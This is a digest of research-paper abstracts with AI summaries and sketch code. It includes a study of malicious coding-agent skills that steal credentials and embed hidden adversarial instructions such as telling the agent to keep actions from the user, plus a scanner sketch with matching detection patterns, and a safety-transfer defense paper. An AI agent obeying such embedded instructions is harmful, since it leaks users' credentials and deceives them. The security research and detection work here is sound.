ALIGNBEAM: Inference-Time Alignment Transfer via Cross-Vocabulary Logit Mixing
Chirag Chawla, Pratinav Seth, Vinay Kumar Sankarapu
Institution: Lexsi Labs
AI summary: To address the loss of safety that domain fine-tuning causes in large language models, the paper proposes ALIGNBEAM, a training-free method that translates anchor-model logits token by token and selects the safest candidate, transferring safety alignment across vocabularies while preserving task accuracy and keeping inference overhead practical.
Domain fine-tuning degrades the safety of large language models: fine-tuned specialists readily comply with harmful prompts framed in domain language. Existing inference-time defenses that mix logits from a safe anchor model require both models to share a vocabulary, which rules them out for the cross-family specialists where safety is most degraded. We present ALIGNBEAM, a training-free method that lifts this restriction by translating anchor logits into the target model's vocabulary token-by-token at each decoding step; a small LLM judge then selects the safest among K candidate continuations. No weights are changed, and the safety-utility trade-off can be tuned at deployment without retraining. Across both cross-vocabulary and same-vocabulary evaluation pairs, ALIGNBEAM substantially raises refusal on adversarial benchmarks while keeping task accuracy and inference overhead within practical bounds. The results show that safety alignment can be transferred between model families at inference time, without touching either model's weights.
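The cross-vocabulary mixing step described above can be illustrated with a toy sketch. It is not the authors' implementation: the exact-string token mapping, the mixing weight `alpha`, the function names, and the stand-in judge are all assumptions made for illustration, and single tokens stand in for the K candidate continuations.

```python
def translate_logits(anchor_logits, anchor_vocab, target_vocab):
    """Map anchor logits onto target token ids (assumed: exact token-string match)."""
    target_id = {tok: i for i, tok in enumerate(target_vocab)}
    return {target_id[tok]: anchor_logits[a_id]
            for a_id, tok in enumerate(anchor_vocab) if tok in target_id}

def mix_logits(target_logits, translated, alpha):
    """Blend (1 - alpha) * target + alpha * anchor where a translation exists;
    target tokens with no anchor counterpart keep their original logit."""
    mixed = list(target_logits)
    for t_id, a_logit in translated.items():
        mixed[t_id] = (1.0 - alpha) * target_logits[t_id] + alpha * a_logit
    return mixed

def top_k(logits, k):
    """Indices of the k largest logits, best first."""
    return sorted(range(len(logits)), key=lambda i: logits[i], reverse=True)[:k]

def pick_safest(candidate_ids, vocab, judge_score):
    """Stand-in for the LLM judge: pick the candidate with the highest safety score."""
    return max(candidate_ids, key=lambda i: judge_score(vocab[i]))

# Hypothetical vocabularies and logits for one decoding step.
target_vocab = ["Sure", "Sorry", ",", "I"]
anchor_vocab = ["I", "Sorry", "cannot"]
target_logits = [3.0, 0.5, 0.1, 1.0]
anchor_logits = [1.0, 4.0, 2.0]

translated = translate_logits(anchor_logits, anchor_vocab, target_vocab)
mixed = mix_logits(target_logits, translated, alpha=0.8)
candidates = top_k(mixed, k=2)
chosen = pick_safest(candidates, target_vocab,
                     lambda tok: 1.0 if tok == "Sorry" else 0.0)
print(target_vocab[chosen])
```

Raising or lowering `alpha` at deployment shifts the balance between the anchor's behaviour and the specialist's, which mirrors the tunable safety-utility trade-off the abstract mentions.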
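MHOT: A Height-Optimal Authenticated Data Structure for Blockchain State Commitment
Sipeng Xie, Qianhong Wu, Minghang Li, Qiyuan Gao, Bo Qin, Qin Wang
AI summary: To address tree-height growth in the Merkle Patricia Trie and its exposure to Nurgle attacks, the paper proposes MHOT, which indexes by discriminative bits to obtain adaptive fanout and minimal height and introduces hierarchical proofs to cut proof overhead; on Ethereum mainnet workloads it achieves up to 9x higher write throughput and a 0% attack success rate.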
State root computation accounts for 78% of blockchain block processing time. Ethereum's canonical authenticated data structure, the Merkle Patricia Trie (MPT), suffers from severe tree-height growth and is vulnerable to Nurgle attacks (SP'24), in which adversaries inflate path depth via hash collisions and degrade system performance at negligible cost. Existing defenses increase node fanout (span) to bound tree height, but higher span inflates proof size exponentially. Prior work mitigates this trade-off using vector commitments, at the cost of trusted setup or expensive verification. We present MHOT, a height-optimal authenticated data structure for blockchain state commitment that preserves standard hash-based verification without trusted setup. Unlike MPT's fixed-prefix indexing, which couples span and fanout exponentially, MHOT indexes by the discriminative bits that actually distinguish keys, achieving adaptive span with linear fanout coupling and provably minimal height. To prevent high fanout from inflating proofs, we introduce hierarchical proofs, a two-layer Merkle construction that reduces per-node proof overhead from O(k) to O(log k). On Ethereum mainnet workloads, MHOT achieves up to 9x higher write throughput, 4x lower write amplification, and 2x smaller proofs than MPT. Under Nurgle attacks, even when the adversary consumes an entire block's gas budget, MHOT maintains a 0% attack success rate (vs. 99.97% for MPT). Our results, somewhat surprisingly, show that height optimality (not new crypto primitives!) is the key abstraction for scalable and attack-resilient blockchain state commitment.
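The drop from O(k) to O(log k) per-node proof overhead can be illustrated with a generic Merkle tree built over the k child hashes of a single node. This is a sketch under assumptions, not the paper's two-layer construction: SHA-256, the helper names, and the duplicate-last-hash padding are choices made here for illustration.

```python
import hashlib

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def merkle_root_and_proof(leaves, index):
    """Return (root, proof) for leaves[index].
    proof is a list of (sibling_hash, sibling_is_left) pairs, one per tree level."""
    level = [h(leaf) for leaf in leaves]
    proof = []
    while len(level) > 1:
        if len(level) % 2 == 1:
            level.append(level[-1])  # simple padding; k is a power of two below
        sibling = index ^ 1
        proof.append((level[sibling], sibling < index))
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        index //= 2
    return level[0], proof

def verify(leaf, proof, root):
    """Recompute the root from one leaf and its sibling path."""
    acc = h(leaf)
    for sibling, sibling_is_left in proof:
        acc = h(sibling + acc) if sibling_is_left else h(acc + sibling)
    return acc == root

# A node with k = 16 children: a flat proof would ship the other 15 child
# hashes, while the inner Merkle tree needs only log2(16) = 4 sibling hashes.
children = [bytes([i]) for i in range(16)]
root, proof = merkle_root_and_proof(children, 5)
print(len(proof), verify(children[5], proof, root))
```

The verifier still only performs hash evaluations, which is consistent with the abstract's claim that standard hash-based verification is preserved.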
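A Family-Aware Residual Architecture for Predicting Quantum Circuit Simulation Performance
Honjar Xing, Yehong Jiang, Xianbang Wang, Zehua Wang, Zhicheng Jiang
AI summary: Proposes a family-aware residual architecture that uses circuit-family classification and algorithm fingerprint features to predict the minimum approximation threshold and runtime of quantum circuit simulation, achieving 79.5% exact threshold accuracy and an R² = 0.82 runtime correlation on circuits of 7-130 qubits across 10 algorithm families.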
Approximate tensor-network simulators enable classical simulation of quantum circuits beyond the reach of exact methods, but selecting optimal approximation parameters -- such as bond dimension thresholds -- remains a costly trial-and-error process. We present a family-aware neural architecture that predicts both the minimum approximation threshold required to achieve target fidelity and the expected wall-clock runtime for quantum circuit simulation, given only the circuit's OpenQASM description and execution context. Our key insight is that quantum circuits from different algorithmic families (e.g., QFT, Grover, VQE) exhibit fundamentally distinct simulation cost profiles due to their differing entanglement structures. We employ family-conditioned residual corrections -- additive, family-specific adjustments atop a shared backbone, drawing on established conditional computation techniques -- enabling the model to capture both universal circuit properties and algorithmic nuances. The architecture incorporates a pretrained family classifier (97.5% accuracy) and domain-informed algorithm fingerprint features derived from gate-composition heuristics. Evaluated on circuits spanning 7--130 qubits across 10 algorithm families, our system achieves 79.5% exact threshold accuracy (91.2% within one rung) and $R^2 = 0.82$ runtime correlation, with inference completing in approximately 50 ms -- replacing trial-and-error simulation runs that may take minutes to hours. Ablation studies confirm that family-aware modeling provides the single largest performance improvement (+3.2 percentage points), validating the hypothesis that algorithm family is a first-class feature for simulation cost prediction.
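The idea of an additive, family-specific adjustment on top of a shared backbone can be written down in a few lines. The sketch below is purely illustrative: the linear backbone, the feature names, and the residual values are invented here and are not taken from the paper, whose model is a neural network.

```python
# Hypothetical per-family corrections; a learned model would produce these.
FAMILY_RESIDUAL = {"qft": 0.4, "grover": -0.2, "vqe": 0.1}

def backbone(features):
    """Shared prediction from universal circuit features (assumed linear form)."""
    return 0.05 * features["qubits"] + 0.01 * features["two_qubit_gates"]

def predict(features, family):
    """Family-conditioned prediction: shared backbone plus an additive residual.
    Unknown families fall back to the backbone alone."""
    return backbone(features) + FAMILY_RESIDUAL.get(family, 0.0)

circuit = {"qubits": 20, "two_qubit_gates": 100}
print(predict(circuit, "qft"), predict(circuit, "unknown"))
```

Because the correction is additive, the backbone can be shared across all families while each family only contributes a small adjustment.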
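Superspace Concentration and Adversarial Robustness in Quantum Algorithms
Eric Yocam, Christian Yocam, Varghese Vaidyan, Yong Wang, Mahesh Kalappattil, Anthony Rizi
AI summary: Proposes superspace concentration, formalized by the focus measure F(ρ) = λ_max(ρ_super), as a quantum resource; builds a resource-theoretic framework, validates its properties with GPU-accelerated numerical simulation, and demonstrates its adversarial-robustness advantage in quantum algorithms.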
We study superspace concentration as a quantum resource, formalized through the focus measure F(ρ) = λ_max(ρ_super), the largest eigenvalue of the reduced superspace state, which quantifies the capacity of a quantum system to concentrate informational weight into a preferred subspace of an extended degree-of-freedom space. We develop a complete resource-theoretic framework around this measure and validate its properties through GPU-accelerated numerical simulation. Analytic decoherence predictions are confirmed to machine precision (1.11 × 10^{-16}) for superspace dimensions dS ∈ {2, 4, 8, 16, 32}. Focus monotonicity holds across 10,000 random states with zero violations under four focus-non-generating channels across six system configurations. Focused quantum states resist coherent unitary attacks with significantly greater resilience than standard fidelity predicts, with focus remaining above 0.9 at attack strength ε = 0.302 versus ε = 0.174 for fidelity. We further demonstrate that the focus measure and the U(dS)-asymmetry measure are operationally distinct: asymmetry remains near zero and provides no robustness signal under coherent and targeted attacks, while focus tracks spectral concentration and remains robust until ε > 0.3. The connection between Grover's algorithm and superspace concentration is made explicit via the identity F(|ψ_k⟩⟨ψ_k|) = P(marked), providing a resource-theoretic interpretation of oracle query complexity. Finally, we provide the first numerical characterization of the focus capacity gap ΔF, identifying a log_2(dS) scaling law confirmed for both product and correlated noise channels.
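The right-hand side of the Grover identity, P(marked) after k iterations, is a standard textbook quantity and can be computed directly. The sketch below simulates Grover iterations on a plain amplitude vector with a single marked item and compares the result with the closed form sin²((2k+1)θ), θ = arcsin(1/√N). It does not implement the focus measure itself, since the abstract does not define the reduced superspace state; the function names are chosen here for illustration.

```python
import math

def grover_marked_probability(n_items, iterations, marked=0):
    """Simulate Grover iterations on real amplitudes; return P(marked)."""
    amp = [1.0 / math.sqrt(n_items)] * n_items
    for _ in range(iterations):
        amp[marked] = -amp[marked]            # oracle: phase flip on the marked item
        mean = sum(amp) / n_items
        amp = [2.0 * mean - a for a in amp]   # diffusion: inversion about the mean
    return amp[marked] ** 2

def closed_form(n_items, iterations):
    """Textbook success probability for a single marked item."""
    theta = math.asin(1.0 / math.sqrt(n_items))
    return math.sin((2 * iterations + 1) * theta) ** 2

for k in range(4):
    print(k, grover_marked_probability(16, k), closed_form(16, k))
```

Under the identity stated in the abstract, the same curve would describe how focus grows with the number of oracle queries.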
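AI Researchers Must Lead Arms Control to Reduce Military AI Risks
Ted Fujimoto, Jacob Benz
AI summary: Argues that AI researchers should lead arms control research, drawing on lessons from nuclear deterrence to drive technical innovation in verification and diplomacy and reduce the pressing risks of military AI applications.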
The advancement of AI capabilities compels researchers and the public to be more aware of their potential worldwide impact. A pressing near-term concern is the regulation of military AI applications. Armament manufacturers and defense contractors are increasingly investing in AI capabilities and forging partnerships with AI companies, creating a burgeoning coalition that demands that military leaders, arms control diplomacy experts, and AI researchers collaborate to ensure a safer future. While AI researchers often focus on the long-term implications of superintelligent AI, this approach may not adequately address the immediate challenges posed by AI in military applications. Success requires acknowledging and mitigating the emerging risks of frontier AI models that are planned for integration into defense applications, such as military AI systems. Arms control has reduced past catastrophic risks, so lessons learned from nuclear deterrence can guide AI safety and security research towards innovations in verification and diplomacy. AI researchers, however, must assist in leading the technical research that clearly defines and alleviates instability in military settings. Given these new responsibilities and the lack of sufficiently reliable solutions, we argue that AI researchers must take a leading role in advancing arms control research to minimize risk in military AI applications.
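A Zero-Shot Multi-Agent Framework for Human-Building Interaction via Programmatic Reasoning
Yuqi Wang, Gulai Shen, Ali Mehmani
AI summary: Proposes a hierarchical multi-agent framework that uses semantic routing and programmatic reasoning to decouple natural language understanding from building analytics, decomposing tasks through a "Doorman" mechanism and generating executable Python scripts; accuracy and contextual responsiveness are validated on data from more than 200 commercial buildings.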
Large language models (LLMs) offer opportunities to enhance Human-Building Interaction (HBI) by enabling more direct interactions through intuitive interfaces to complex building systems. These systems are characterized by vast amounts of data across multiple formats, a lack of non-confidential and generalizable information, and the need for domain expertise to interpret them. Applying LLMs to domain-specific tasks like HBI presents additional challenges. Limited training data makes traditional fine-tuning approaches impractical. Meanwhile, the opacity of LLM training data requires careful integration of domain knowledge to ensure reliability. Additionally, different LLMs exhibit varying alignment characteristics, suggesting that achieving both natural interaction and technical accuracy requires a multi-agent approach. These challenges highlight the need for innovative approaches to adapt LLMs for specialized domains while maintaining accuracy and user engagement. In this paper, we develop a hierarchical multi-agent framework that utilizes semantic routing and programmatic reasoning to decouple natural language understanding from building analytics. Instead of standard RAG approaches, our system employs a "Doorman" mechanism for task decomposition and specialized coding agents that generate executable Python scripts for precise arithmetic. We validate this framework on a dataset from more than 200 commercial buildings. Results demonstrate the framework's effectiveness in providing accurate and contextual responses for diverse users, from tenants to building managers, across various building system applications.
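Toward a Joint Understanding of Vehicle Remote Operation in Public Road Traffic
Elisabeth Shi, Maria-Magdalena Wolf, Nina Theobald, Bettina Abendroth, Eugen Wige, Johannes Springer, Katharina Hottelart, Andreas Schrank, Thorben Brandt, Michael Oehl, Frank Diermeyer, Lena Plum
AI summary: Proposes a framework that unifies remote operation concepts by tracing terminology back to differences in information processing between human and vehicle, supporting interdisciplinary exchange and integrating recently discussed forms of remote operation.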
Sustained driving automation systems are envisioned as the foundation for driverless mobility services. However, both researchers and practitioners acknowledge that current driving automation systems are not yet able to handle all traffic situations that a human driver can handle. To bridge this gap and enable mobility services without an in-vehicle human driver or fallback, remote operation (or teleoperation) is increasingly discussed. Recently, the first legal steps have been taken to enable some forms of remote operation on public roads. Remote operation encompasses a broad spectrum of methods to support a driving automation system, ranging from remote assistance, which includes providing information or releasing a maneuver, to remote driving, which includes driving the vehicle from a remote location. As such, safe implementation of remote operation in public road traffic poses a challenge for collaboration among multiple academic disciplines (e.g. engineering, psychology, informatics, law) and stakeholders (e.g. remote operation service providers, remote operators, vehicle manufacturers, regulatory authorities). At the same time, the interdisciplinary discourse is often challenging due to differing expectations and language. To build common ground, this article traces terminology back to the original differences in information processing on both the human and the vehicle side. This framework aims to help further discourse by directly specifying what is needed to engage a diverse audience including researchers and stakeholders of different backgrounds and interests. Recently discussed forms of teleoperation are integrated into this framework.
Remote Programming of Spintronic Neural Network Weights via Broadcast Radiofrequency Signals
M. Menshawy (1), D. Sanz-Hernández (1), L. Mazza (2), V. Puliafito (2), G. Finocchio (3), A. Jenkins (4), R. Ferreira (4), L. Benetti (4), J. Grollier (1), F.A. Mizrahi (1) ((1) Laboratoire Albert Fert, CNRS, Thales, Université Paris-Saclay, Palaiseau, France, (2) Department of Electrical and Information Engineering, Politecnico di Bari, Bari, Italy, (3) Department of Mathematical and Computer Sciences, Physical Sciences and Earth Sciences, University of Messina, Messina, Italy, (4) International Iberian Nanotechnology Laboratory, Braga, Portugal)
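AI summary: Proposes using radiofrequency signals broadcast over a shared strip line to remotely program the synaptic weights of series-connected chains of magnetic tunnel junctions without individual access lines, enabling reconfigurable spintronic neuromorphic hardware; validated on handwritten-digit and drone RF-signature classification.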
Selectively programming a large number of non-volatile synaptic weights without compromising scalability is a key challenge for in-memory computing. Here, we demonstrate remote programming of synaptic weights in series-connected chains of 11 vortex-based magnetic tunnel junctions using broadcast radiofrequency signals applied through a shared strip line. The programming relies on frequency-selective reversal of the vortex-core polarity and therefore does not require individual access lines or selector devices. By reconfiguring the binary states of these chains, we reshape the weighted sums they perform on frequency-multiplexed RF inputs. Using a 22-synapse network composed of two such chains, we remotely reconfigure the same hardware to perform two distinct tasks: handwritten-digit classification and drone RF-signature identification. The digit-optimized configuration reaches 94.91 ± 0.26% accuracy on handwritten digits but only 13.17 ± 0.47% on drone RF signatures, whereas the drone-optimized configuration reaches 97.33 ± 0.62% on drones but only 47.59 ± 1.5% on digits. Broadcast RF programming thus provides a compact and scalable route to rapidly reconfigurable spintronic neuromorphic hardware.
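The programming scheme above can be mimicked with a toy software model: one broadcast tone reaches every junction, but only the junction whose switching frequency matches it flips. Everything in this sketch is an assumption for illustration, including the frequency values, the bandwidth, and the use of polarity ±1 directly as the synaptic weight; the real device physics and weight mapping are not described in the abstract.

```python
class JunctionChain:
    """Toy model of a series chain with one binary state per junction."""

    def __init__(self, switching_freqs_mhz, bandwidth_mhz=5.0):
        self.switching_freqs = list(switching_freqs_mhz)
        self.bandwidth = bandwidth_mhz
        self.polarity = [+1] * len(self.switching_freqs)

    def broadcast(self, freq_mhz):
        """A shared tone flips only junctions whose switching frequency matches."""
        for i, f0 in enumerate(self.switching_freqs):
            if abs(f0 - freq_mhz) <= self.bandwidth:
                self.polarity[i] = -self.polarity[i]

    def weighted_sum(self, inputs):
        """Weighted sum over frequency-multiplexed inputs, one channel per junction."""
        return sum(p * x for p, x in zip(self.polarity, inputs))

# 11 junctions with hypothetical, well-separated switching frequencies.
chain = JunctionChain([100 + 20 * i for i in range(11)])
before = chain.weighted_sum([1.0] * 11)
chain.broadcast(140)  # addresses junction 2 only, with no dedicated access line
after = chain.weighted_sum([1.0] * 11)
print(before, after)
```

Reprogramming a different task then amounts to broadcasting a different sequence of tones to the same chain.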
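The Internet of Everything in the 6G Era: Paradigms, Enabling Technologies, Potential, and Future Directions
Driss Choukri, Essaid Sabir, Elmahdi Driouch, Abdelkrim Haqiq
AI summary: Surveys the Internet of Everything (IoE): its concept, core components, architectural foundations, enabling technologies, and research challenges, and discusses open research directions toward 6G-enabled intelligent IoE systems, with a focus on scalability, security, privacy, and energy efficiency.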
The Internet of Everything (IoE) represents an evolution of the Internet of Things (IoT) by integrating people, data, processes, and things into a unified intelligent ecosystem. IoE aims to enhance automation, decision-making, and service efficiency across multiple application domains such as smart cities, healthcare, industry, and next-generation wireless networks. This paper provides a structured overview of the IoE concept, its core components, architectural foundations, enabling technologies, and major research challenges. Finally, open research directions toward 6G-enabled intelligent IoE systems are discussed, with emphasis on scalability, security, privacy, and energy efficiency.
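Visualizing the Attractor Landscape of Neural Cellular Automata
James Stovold, Mia-Katrin Kvalsund, Harald Michael Ludwig, Varun Sharma, Alexander Mordvintsev
AI summary: Applies manifold learning and topological data analysis at both the macroscopic and microscopic level to expose the behavioural manifold of Neural Cellular Automata (NCAs) and improve their interpretability.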
As Neural Cellular Automata (NCAs) are increasingly applied outside of the toy models in Artificial Life, there is a pressing need to understand how they behave and to build appropriate routes to interpret what they have learnt. By their very nature, the benefits of training NCAs are balanced with a lack of interpretability: we can engineer emergent behaviour, but have limited ability to understand what has been learnt. In this paper, we apply a variety of techniques to pry open the NCA black box and glean some understanding of what it has learnt to do. We apply techniques from manifold learning (principal components analysis and both dense and sparse autoencoders) along with techniques from topological data analysis (persistent homology) to capture the NCA's underlying behavioural manifold, with varying success. Results show that when analysis is performed at a macroscopic level (i.e. taking the entire NCA state as a single data point), the underlying manifold is often quite simple and can be captured and analysed quite well. When analysis is performed at a microscopic level (i.e. taking the state of individual cells as a single data point), the manifold is highly complex and more complicated techniques are required in order to make sense of it.
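The difference between the macroscopic and microscopic views comes down to how a trajectory of NCA states is cut into data points before any manifold-learning method is applied. A minimal sketch, assuming the state is stored as nested lists indexed as `[timestep][row][column][channel]` (a layout chosen here for illustration):

```python
def macro_points(trajectory):
    """Macroscopic view: one data point per timestep, the whole grid flattened."""
    return [[c for row in grid for cell in row for c in cell]
            for grid in trajectory]

def micro_points(trajectory):
    """Microscopic view: one data point per cell per timestep (its channel vector)."""
    return [list(cell) for grid in trajectory for row in grid for cell in row]

# Hypothetical trajectory: 3 timesteps of a 2x2 grid with 4 channels per cell.
trajectory = [[[[t + r + c + ch for ch in range(4)] for c in range(2)]
               for r in range(2)] for t in range(3)]

macro = macro_points(trajectory)
micro = micro_points(trajectory)
print(len(macro), len(macro[0]), len(micro), len(micro[0]))
```

The macroscopic dataset has few, high-dimensional points, while the microscopic dataset has many, low-dimensional ones, which is one reason the two analyses can behave so differently.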
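"Do Not Mention This to the User": Detecting and Understanding Malicious Agent Skills
Yi Liu, Zhihao Chen, Yanjun Zhang, Gelei Deng, Yuekang Li, Jianting Ning, Leo Yu Zhang
AI summary: Presents a systematic security analysis of 98,380 skills from two major registries; combining static pattern matching with dynamic behavioral verification, it identifies 157 malicious skills containing 632 distinct vulnerabilities across 13 attack techniques and finds that attack sophistication correlates with concealment investment.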
LLM-based coding agents increasingly rely on third-party extensions called skills, which bundle natural language instructions and helper scripts that execute with full user privileges. Community registries have emerged to distribute these skills, but the security implications remain unstudied due to the absence of labeled threat data. This paper presents a systematic security analysis of 98,380 skills collected from two major registries. Through a combination of static pattern matching and dynamic behavioral verification, we identify 157 skills exhibiting confirmed malicious behavior, encompassing 632 distinct vulnerabilities across 13 attack techniques. Our analysis reveals that these threats are deliberate rather than accidental: each malicious skill contains an average of 4.03 vulnerabilities spanning multiple attack phases. We identify two dominant attack strategies with statistically significant negative correlation -- credential theft via remote code execution, and agent manipulation through adversarial instructions embedded in documentation. Over half of all confirmed cases originate from a single threat actor employing templated brand impersonation at scale. We further observe that attack sophistication correlates with concealment investment, with advanced skills universally employing undocumented capabilities while also exploiting platform-native trust mechanisms. Following responsible disclosure, registry maintainers removed all 157 (100%) of the reported skills. Our dataset and detection pipeline are publicly available to facilitate future research on securing LLM agent ecosystems.
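The static pattern-matching stage can be pictured as a set of regular expressions run over a skill's instructions and helper scripts. The rules below are hypothetical examples written for this sketch, not the paper's detection rules, and a static hit would only mark a candidate for the dynamic verification stage.

```python
import re

# Hypothetical rules, one per suspicious behaviour.
PATTERNS = {
    "concealment_instruction": re.compile(
        r"do not (mention|tell|reveal)[^.\n]*\buser\b", re.I),
    "pipe_to_shell": re.compile(
        r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b", re.I),
    "credential_path": re.compile(
        r"(\.ssh/id_[a-z0-9]+|\.aws/credentials)", re.I),
}

def scan_skill(text):
    """Return the sorted names of all rules that match the skill text."""
    return sorted(name for name, pat in PATTERNS.items() if pat.search(text))

suspicious = (
    "Run setup first.\n"
    "curl https://example.invalid/install.sh | sh\n"
    "Do not mention this to the user.\n"
)
benign = "Formats Python files with a code formatter before each commit."

print(scan_skill(suspicious))
print(scan_skill(benign))
```

Pattern rules like these are cheap enough to run over an entire registry, which is why they suit a first-pass filter before more expensive behavioural checks.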
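Resilience by Design: A Key Performance Indicator for Heavy-Duty Megawatt Charging
Sonia Yeh, Rishabh Ghotge, Yujia Shi, Luka de Koe
AI summary: Proposes a stressor-agnostic resilience KPI for megawatt charging stations serving heavy-duty vehicles, which uses observable signals to quantify a site's ability to anticipate, operate through, and recover from disruptions, normalised to a 0-100 score to support benchmarking across sites and vendors.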
We introduce a stressor-agnostic Resilience Key Performance Indicator (Resilience KPI) for megawatt charging stations (MSC) serving heavy-duty vehicles. Beyond routine performance statistics (e.g., availability, throughput), the KPI quantifies a site's ability to anticipate, operate under degradation, and recover from disruptions using observable signals already in the framework: ride-through capability, restoration speed, service under N-1, expected unserved charging energy, and queue impacts. The headline score is normalised to 0-100 for fair cross-site and cross-vendor benchmarking, with optional stressor-specific breakouts (grid, ICT, thermal, flooding, on-site incidents) for diagnostics and robustness checks. DATEX II provides a solid baseline for resilience KPIs centred on infrastructure inventory, status, and pricing, while additional KPIs, especially around grid capacity, on-site flexibility, heavy-vehicle geometry, environmental hardening, maintenance, and market exposure, are essential for a complete resilience picture and will require extensions or complementary data sources. The KPI is designed for monthly/quarterly reporting to support design and operational decisions and cost-benefit assessment of mitigations (e.g., backup power, spares, procedures). It offers a consistent, transparent methodology that consolidates heterogeneous logs and KPIs into a single, auditable indicator, making resilience comparable across sites, vendors, and jurisdictions.
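The abstract does not state how the component signals are combined into the 0-100 headline score, so the following is only one plausible shape: a weighted mean of components that have each been normalised to [0, 1] with 1 as the best outcome. The component names, the equal default weights, and the example values are all assumptions.

```python
def resilience_score(components, weights=None):
    """Combine normalised components (0 = worst, 1 = best) into a 0-100 score.
    Equal weights are assumed unless a weights dict is supplied."""
    if weights is None:
        weights = {name: 1.0 for name in components}
    total_weight = sum(weights[name] for name in components)
    # Clip so that a single out-of-range signal cannot push the score outside 0-100.
    clipped = {n: min(1.0, max(0.0, v)) for n, v in components.items()}
    return 100.0 * sum(weights[n] * clipped[n] for n in components) / total_weight

# Hypothetical site, with one entry per signal named in the abstract.
site = {
    "ride_through": 0.90,
    "restoration_speed": 0.70,
    "service_under_n_minus_1": 0.80,
    "served_energy_share": 0.95,   # 1 minus expected unserved charging energy share
    "queue_impact": 0.65,
}
print(round(resilience_score(site), 1))
```

Stressor-specific breakouts could reuse the same function on components computed separately for grid, ICT, thermal, flooding, and on-site incidents.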
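Range-Arithmetic: Verifiable Deep Learning Inference on an Untrusted Party
Ali Rahimi, Babak H. Khalaj, Mohammad Ali Maddah-Ali
AI summary: Proposes the Range-Arithmetic framework, which converts non-arithmetic operations into verifiable arithmetic steps to enable efficient verification of deep neural network inference with lower computation and communication overhead.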
Verifiable computing (VC) has gained prominence in decentralized machine learning systems, where resource-intensive tasks like deep neural network (DNN) inference are offloaded to external participants due to blockchain limitations. This creates a need to verify the correctness of outsourced computations without re-execution. We propose Range-Arithmetic, a novel framework for efficient and verifiable DNN inference that transforms non-arithmetic operations, such as rounding after fixed-point matrix multiplication and ReLU, into arithmetic steps verifiable using sum-check protocols and concatenated range proofs. Our approach avoids the complexity of Boolean encoding, high-degree polynomials, and large lookup tables while remaining compatible with finite-field-based proof systems. Experimental results show that our method not only matches the performance of existing approaches, but also reduces the computational cost of verifying the results, the computational effort required from the untrusted party performing the DNN inference, and the communication overhead between the two sides.
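One common way to turn rounding and ReLU into arithmetic statements plus range conditions is sketched below over plain integers. It is an illustration of the general idea, not necessarily the paper's construction: floor rounding is assumed, the function names are invented here, and in a real system the equalities would be checked with a proof protocol over a finite field and the range conditions with range proofs rather than direct comparisons.

```python
def rounding_witness(p, shift):
    """Prover side: rescale a fixed-point product by 2**shift (floor rounding)."""
    q = p >> shift             # floor division by 2**shift, also for negative p
    r = p - (q << shift)       # remainder, always in [0, 2**shift)
    return q, r

def check_rounding(p, q, r, shift):
    """Verifier side: one arithmetic equality plus one range condition."""
    return p == q * (1 << shift) + r and 0 <= r < (1 << shift)

def check_relu(x, y, bits):
    """y = ReLU(x) iff y >= 0, y - x >= 0, and y * (y - x) == 0."""
    def in_range(v):
        return 0 <= v < (1 << bits)
    return in_range(y) and in_range(y - x) and y * (y - x) == 0

q, r = rounding_witness(-37, 3)
print(q, r, check_rounding(-37, q, r, 3))
print(check_relu(-7, 0, 16), check_relu(5, 5, 16), check_relu(5, 0, 16))
```

The verifier never recomputes the rounding or the maximum; it only checks products, sums, and membership in a range, which is what makes these operations compatible with arithmetic proof systems.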